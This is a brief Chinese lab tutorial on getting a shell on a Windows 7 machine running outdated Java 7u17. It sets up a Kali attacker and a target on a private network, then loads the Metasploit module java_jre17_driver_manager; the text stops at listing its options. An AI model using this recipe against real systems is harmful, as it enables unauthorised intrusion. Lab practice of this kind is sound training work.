基于 java 环境的漏洞利用获取 shell
实验环境:
kali攻击机(192.168.98.30)
window目标机(192.168.98.35)
jre-7u17-windows-i586.exe
实验步骤:
1、搭建java环境
xshell上传jre-7u17-windows-i586.exe到win7
安装都一直点下一步就可以
2、 使用 java 模块 getshell
msfbd run //进入msf
use exploit/multi/browser/java_jre17_driver_manager //使用java攻击模块
show options //查看需要设置的参数